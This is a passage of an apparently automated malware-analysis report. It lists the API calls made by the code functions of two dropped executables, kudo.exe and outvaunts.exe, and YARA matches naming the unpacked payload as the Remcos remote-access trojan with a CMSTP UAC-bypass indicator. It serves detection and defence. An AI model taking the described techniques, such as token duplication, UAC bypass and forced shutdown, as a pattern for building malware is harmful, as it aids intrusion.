              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,5_2_0088C1AC
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,5_2_0088C498
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,5_2_0088C5FE
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C57D SendMessageW,NtdllDialogWndProc_W,5_2_0088C57D
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C88F NtdllDialogWndProc_W,5_2_0088C88F
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C8BE NtdllDialogWndProc_W,5_2_0088C8BE
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C860 NtdllDialogWndProc_W,5_2_0088C860
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C909 NtdllDialogWndProc_W,5_2_0088C909
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088C93E ClientToScreen,NtdllDialogWndProc_W,5_2_0088C93E
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0088CABC
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088CA7C GetWindowLongW,NtdllDialogWndProc_W,5_2_0088CA7C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00801287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,73666F36,NtdllDialogWndProc_W,5_2_00801287
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00801290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,5_2_00801290
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088D3B8 NtdllDialogWndProc_W,5_2_0088D3B8
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,5_2_0088D43E
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008016B5 NtdllDialogWndProc_W,5_2_008016B5
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008016DE GetParent,NtdllDialogWndProc_W,5_2_008016DE
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0080167D NtdllDialogWndProc_W,5_2_0080167D
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088D78C NtdllDialogWndProc_W,5_2_0088D78C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0080189B NtdllDialogWndProc_W,5_2_0080189B
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088BC5D NtdllDialogWndProc_W,CallWindowProcW,5_2_0088BC5D
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,5_2_0088BF8C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088BF30 NtdllDialogWndProc_W,5_2_0088BF30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01363633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,6_2_01363633
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,6_2_013EC1AC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC57D SendMessageW,NtdllDialogWndProc_W,6_2_013EC57D
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,6_2_013EC5FE
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,6_2_013EC498
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC93E ClientToScreen,NtdllDialogWndProc_W,6_2_013EC93E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC909 NtdllDialogWndProc_W,6_2_013EC909
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC860 NtdllDialogWndProc_W,6_2_013EC860
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC8BE NtdllDialogWndProc_W,6_2_013EC8BE
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EC88F NtdllDialogWndProc_W,6_2_013EC88F
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013ECA7C GetWindowLongW,NtdllDialogWndProc_W,6_2_013ECA7C
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013ECABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_013ECABC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013ED3B8 NtdllDialogWndProc_W,6_2_013ED3B8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01361290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,6_2_01361290
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01361287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,73666F36,NtdllDialogWndProc_W,6_2_01361287
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013ED43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,6_2_013ED43E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013ED78C NtdllDialogWndProc_W,6_2_013ED78C
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0136167D NtdllDialogWndProc_W,6_2_0136167D
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013616B5 NtdllDialogWndProc_W,6_2_013616B5
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013616DE GetParent,NtdllDialogWndProc_W,6_2_013616DE
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0136189B NtdllDialogWndProc_W,6_2_0136189B
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EBC5D NtdllDialogWndProc_W,CallWindowProcW,6_2_013EBC5D
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EBF30 NtdllDialogWndProc_W,6_2_013EBF30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013EBF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,6_2_013EBF8C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_0086A1EF
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00858310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,756C1AAC,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,5_2_00858310
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_008651BD
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_013C51BD
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008231875_2_00823187
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082D9755_2_0082D975
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008221C55_2_008221C5
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008362D25_2_008362D2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008803DA5_2_008803DA
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0083242E5_2_0083242E
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008225FA5_2_008225FA
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0080E6A05_2_0080E6A0
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008166E15_2_008166E1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0085E6165_2_0085E616
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0083878F5_2_0083878F
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008688895_2_00868889
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008188085_2_00818808
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008368445_2_00836844
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008808575_2_00880857
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082CB215_2_0082CB21
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00836DB65_2_00836DB6
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00816F9E5_2_00816F9E
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008130305_2_00813030
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082F1D95_2_0082F1D9
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008012875_2_00801287
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008214845_2_00821484
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008155205_2_00815520
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008276965_2_00827696
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008157605_2_00815760
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008219785_2_00821978
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00839AB55_2_00839AB5
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0080FCE05_2_0080FCE0
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00821D905_2_00821D90
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0082BDA65_2_0082BDA6
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00887DDB5_2_00887DDB
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00813FE05_2_00813FE0
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0080DF005_2_0080DF00
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00A407785_2_00A40778
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013831876_2_01383187
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138D9756_2_0138D975
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013821C56_2_013821C5
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013E03DA6_2_013E03DA
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013962D26_2_013962D2
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013825FA6_2_013825FA
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0139242E6_2_0139242E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0139878F6_2_0139878F
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013BE6166_2_013BE616
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0136E6A06_2_0136E6A0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013766E16_2_013766E1
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013788086_2_01378808
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013E08576_2_013E0857
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013968446_2_01396844
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C88896_2_013C8889
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138CB216_2_0138CB21
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01396DB66_2_01396DB6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01376F9E6_2_01376F9E
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138F1D96_2_0138F1D9
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013730306_2_01373030
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013612876_2_01361287
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013755206_2_01375520
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013814846_2_01381484
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013757606_2_01375760
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013876966_2_01387696
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013819786_2_01381978
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01399AB56_2_01399AB5
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0138BDA66_2_0138BDA6
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01381D906_2_01381D90
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013E7DDB6_2_013E7DDB
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0136FCE06_2_0136FCE0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_0136DF006_2_0136DF00
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01373FE06_2_01373FE0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_008AFB886_2_008AFB88
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 7_2_00CDFB307_2_00CDFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 8_2_007DFB308_2_007DFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 9_2_0087FB309_2_0087FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 10_2_007DFB3010_2_007DFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 11_2_009CFB3011_2_009CFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 12_2_0083FB3012_2_0083FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 13_2_0071FB3013_2_0071FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 14_2_0089FB3014_2_0089FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 15_2_0092FB3015_2_0092FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 16_2_0095FB3016_2_0095FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 18_2_00CAFB3018_2_00CAFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 19_2_0079FEC019_2_0079FEC0
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 20_2_008BF7E820_2_008BF7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 21_2_008FFB3021_2_008FFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 22_2_0093FB3022_2_0093FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 23_2_0091F7E823_2_0091F7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 24_2_0076FB3024_2_0076FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 25_2_0086F7E825_2_0086F7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 26_2_0088FB3026_2_0088FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 27_2_00AEF7E827_2_00AEF7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 28_2_0068FB3028_2_0068FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 29_2_00A7F7E829_2_00A7F7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 30_2_0096FB3030_2_0096FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 31_2_0076F7E831_2_0076F7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 32_2_006BF7E832_2_006BF7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 33_2_00BBFB3033_2_00BBFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 34_2_006CF7E834_2_006CF7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 35_2_00AEFB3035_2_00AEFB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 36_2_0096FB3036_2_0096FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 37_2_007BF7E837_2_007BF7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 38_2_0082FB3038_2_0082FB30
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 39_2_0079F7E839_2_0079F7E8
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: String function: 01367DE1 appears 36 times
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: String function: 01388900 appears 42 times
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: String function: 01380AE3 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: String function: 00828900 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: String function: 00807DE1 appears 35 times
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: String function: 00820AE3 appears 70 times
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
